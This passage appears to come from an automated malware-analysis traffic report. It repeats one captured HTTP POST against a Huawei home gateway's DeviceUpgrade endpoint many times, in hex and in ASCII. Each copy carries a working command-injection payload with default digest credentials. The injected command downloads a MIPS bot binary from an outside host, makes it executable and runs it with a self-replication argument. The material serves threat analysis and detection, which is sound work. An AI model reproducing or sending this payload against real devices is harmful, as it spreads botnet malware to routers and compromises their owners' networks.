73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 